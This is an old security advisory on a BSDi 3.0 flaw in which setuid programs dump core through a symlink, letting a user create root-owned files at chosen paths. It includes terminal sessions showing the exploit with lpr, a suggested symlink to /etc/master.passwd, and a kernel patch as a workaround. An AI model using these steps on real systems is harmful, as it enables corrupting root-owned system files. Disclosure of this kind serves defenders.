core anomalies


    BSDi 3.0


    A  small  and  neat  bug  in  BSDi 3.x allows people to arbitrarly
    write files with crap for data, but not overwrite them. Like so:

    Have a symbolic link,  called [programname].core to desired  file.
    Program must be setuid root.

        beep[ /tmp ] ls -la lpr.core
        lrwxrwxrwt  1 root  wheel  9 Jun 19 20:30 lpr.core@ -> /etc/TEST
        beep[ /tmp ]

    Just to make sure that file doesn't exist:

        beep[ /tmp ] ls -la /etc/TEST
        ls: /etc/TEST: No such file or directory
        beep[ /tmp ]

    Run program.  (In our  case lpr  is convenient  since it waits for
    tty input and suspends itself.)

        beep[ /tmp ] lpr &
        [1] 27886
        beep[ /tmp ]
        [1]  + Suspended (tty input)         lpr
        beep[ /tmp ]

    Kill it with the ABRT signal.

        beep[ /tmp ] kill -ABRT %1
        beep[ /tmp ] fg
        Abort (core dumped)
        beep[ /tmp ]

    And voila:

        beep[ /tmp ] ls -la /etc/TEST
        -rw-------  1 root  wheel  184320 Jun 19 20:39 /etc/TEST
        beep[ /tmp ]

    This exploit is similar to the Solaris 2.4 core exploit - with a
    few notable diffrences:

        A.) BSDi doesn't give a  damn that the euid!=ruid, so  finding
            a setgid program with priviliges isn't neccesary.

        B.) BSDi  _does_ however,  check if  the file  exists, so it's
            quite impossible to overwrite files.  Anyway, this is  not
            100% true.  Try:

        ln -s /etc/master.passwd /tmp/lpr.core

            It seems if the permissions are 0600 on the file you  link
            to it will overwrite the file.

        C.) BSDi  _does_ change  the permissions  of the  core dump to
            600, and it keeps on being owned by root, so changing  the
            file is impossible as well.

    Credit goes to Nir Soffer.


    Below is a  quick workaround until  you apply patch  M300-023 (for
    3.0).  Until that, apply the patch to kern/kern_sig.c.  A real fix
    would require  setting the  P_SUGID flag  in the  exec handler  in
    kern_exec.c. (by

    *** kern_sig.c.orig     Tue Oct 15 12:23:05 1996
    --- kern_sig.c  Fri Jun 20 16:26:08 1997
    *** 1198,1206 ****
             * Don't dump if not root and the process has used set user or
             * group privileges.
    !       if (p->p_flag & P_SUGID &&
    !           (error = suser(p->p_ucred, &p->p_acflag)) != 0)
    !               return (error);

            /* Don't dump if will exceed file size limit. */
            if (ctob(UPAGES + vm->vm_dsize + vm->vm_ssize) >=
    --- 1198,1208 ----
             * Don't dump if not root and the process has used set user or
             * group privileges.
    !       if ((p->p_flag & P_SUGID || p->p_cred->p_ruid != p->p_ucred->cr_uid) &&
    !           /*(error = suser(p->p_ucred, &p->p_acflag)) != 0)
    !               return (error);*/
    !           p->p_cred->p_ruid)
    !               return EPERM;

            /* Don't dump if will exceed file size limit. */
            if (ctob(UPAGES + vm->vm_dsize + vm->vm_ssize) >=